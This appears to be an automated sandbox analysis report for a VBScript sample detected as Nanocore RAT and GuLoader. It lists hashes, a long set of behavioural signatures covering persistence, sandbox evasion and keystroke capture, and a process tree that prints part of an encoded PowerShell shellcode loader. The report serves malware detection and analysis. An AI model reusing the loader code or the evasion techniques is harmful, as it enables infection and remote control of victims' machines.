Edit tour
Windows
Analysis Report
IMG 0045434.vbs
Overview
General Information
| Sample Name: | IMG 0045434.vbs |
| Analysis ID: | 562140 |
| MD5: | 813117cdcd80979365fd6d9586d11e4a |
| SHA1: | e28ef2705053405e87f440f078f31d13b09a9ee3 |
| SHA256: | 1def093ef16309c10c38b5426ac396019c4ddc074394b022626b8dce1ea2acaa |
| Infos: |   |
 | |
Detection
Nanocore GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
Antivirus detection for URL or domain
Yara detected Nanocore RAT
Yara detected GuLoader
Hides threads from debuggers
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Creates autostart registry keys with suspicious values (likely registry only malware)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64native
wscript.exe (PID: 7064 cmdline: C:\Windows \System32\ wscript.ex e "C:\User s\user\Des ktop\IMG 0 045434.vbs " MD5: 0639B0A6F69B3265C1E42227D650B7D1) 
powershell.exe (PID: 7640 cmdline: C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe" - EncodedCom mand "IwBi AHIAaQBjAG sAIABMAGkA bABsAGkAdA BoACAAUABv AHMAdAA4AC AAVABhAGMA dABpAGwAZQ BzAGkAIABS AEEARABJAE MAVQAgAFAA YQByAHIAYQ BmAG8AdQBy AGEAIABTAG UAcgB2AGIA agBlAHIANA AgAEIAdQB0 AHQAdwBvAD gAIABnAGgA ZQBuAHQAIA BPAE0AUwBL ACAAUwBvAG 4AZwBpAHMA aABtAGkAMw AgAEMAVQBQ AFAARQBSAF MARABFAFgA IABTAHIAZw BlADkAIABJ AG4AZwBuAH UAMQAgAEsA YQBuAGQAZQ BsAGEAYgBy ADMAIABTAG EAcgBvAG4A aQBjACAATQ BJAEsARQBZ AE4ATwBUAE gAIABOAEkA VABSAEUAUg BJAE4AIABU AEEAQwBLAC AAUABJAEcA UABFAE4AQg AgAEIAZQB0 AGEAcABhAH IAdAA1ACAA ZwBlAG4AaQ BvAGgAIABV AGcAZQBzAG sAcgBpAGYA IABCAGUAcw BsAGEAZwBz AG0ANwAgAE 4AbwBuAHAA cwB5AGMAaA A5ACAAcwBl AG4AcwBpAH QAaQB6ACAA DQAKAA0ACg ANAAoAQQBk AGQALQBUAH kAcABlACAA LQBUAHkAcA BlAEQAZQBm AGkAbgBpAH QAaQBvAG4A IABAACIADQ AKAHUAcwBp AG4AZwAgAF MAeQBzAHQA ZQBtADsADQ AKAHUAcwBp AG4AZwAgAF MAeQBzAHQA ZQBtAC4AUg B1AG4AdABp AG0AZQAuAE kAbgB0AGUA cgBvAHAAUw BlAHIAdgBp AGMAZQBzAD sADQAKAHAA dQBiAGwAaQ BjACAAcwB0 AGEAdABpAG MAIABjAGwA YQBzAHMAIA BTAGwAdQBk AHIAZQBjAG gAMQANAAoA ewANAAoAWw BEAGwAbABJ AG0AcABvAH IAdAAoACIA bgB0AGQAbA BsAC4AZABs AGwAIgApAF 0AcAB1AGIA bABpAGMAIA BzAHQAYQB0 AGkAYwAgAG UAeAB0AGUA cgBuACAAaQ BuAHQAIABO AHQAQQBsAG wAbwBjAGEA dABlAFYAaQ ByAHQAdQBh AGwATQBlAG 0AbwByAHkA KABpAG4AdA AgAFMAbAB1 AGQAcgBlAG MAaAA2ACwA cgBlAGYAIA BJAG4AdAAz ADIAIABWAE UAUgBTAEEA TABFAFIATg AsAGkAbgB0 ACAARgBvAH IAYgBpAHMA dAByAGkAbg AsAHIAZQBm ACAASQBuAH QAMwAyACAA UwBsAHUAZA ByAGUAYwBo ACwAaQBuAH QAIABSAGUA ZgByAG0AYQ BuACwAaQBu AHQAIABTAG wAdQBkAHIA ZQBjAGgANw ApADsADQAK AFsARABsAG wASQBtAHAA bwByAHQAKA AiAGsAZQBy AG4AZQBsAD MAMgAuAGQA bABsACIAKQ BdAHAAdQBi AGwAaQBjAC AAcwB0AGEA dABpAGMAIA BlAHgAdABl AHIAbgAgAE kAbgB0AFAA dAByACAAQw ByAGUAYQB0 AGUARgBpAG wAZQBBACgA cwB0AHIAaQ BuAGcAIABN AG8AbgBzAH QAcgAsAHUA aQBuAHQAIA BNAGUAbABs AGUAOAAsAG kAbgB0ACAA TgBvAG4AcA BlAHIAYwBl AHAALABpAG 4AdAAgAFMA bAB1AGQAcg BlAGMAaAAw ACwAaQBuAH QAIABIAEEA QgBBAE4ALA BpAG4AdAAg AEIAQQBBAE 4ALABpAG4A dAAgAE4AUg BJAE4ARwBT ACkAOwANAA oAWwBEAGwA bABJAG0AcA BvAHIAdAAo ACIAawBlAH IAbgBlAGwA MwAyAC4AZA BsAGwAIgAp AF0AcAB1AG IAbABpAGMA IABzAHQAYQ B0AGkAYwAg AGUAeAB0AG UAcgBuACAA aQBuAHQAIA BSAGUAYQBk AEYAaQBsAG UAKABpAG4A dAAgAEYAbw ByAGIAaQBz AHQAcgBpAG 4AMAAsAHUA aQBuAHQAIA BGAG8AcgBi AGkAcwB0AH IAaQBuADEA LABJAG4AdA BQAHQAcgAg AEYAbwByAG IAaQBzAHQA cgBpAG4AMg AsAHIAZQBm ACAASQBuAH QAMwAyACAA RgBvAHIAYg BpAHMAdABy AGkAbgAzAC wAaQBuAHQA IABGAG8Acg BiAGkAcwB0 AHIAaQBuAD QAKQA7AA0A CgBbAEQAbA BsAEkAbQBw AG8AcgB0AC gAIgB1AHMA ZQByADMAMg AuAGQAbABs ACIAKQBdAH AAdQBiAGwA aQBjACAAcw B0AGEAdABp AGMAIABlAH gAdABlAHIA bgAgAEkAbg B0AFAAdABy ACAAQwBhAG wAbABXAGkA bgBkAG8Adw BQAHIAbwBj AFcAKABJAG 4AdABQAHQA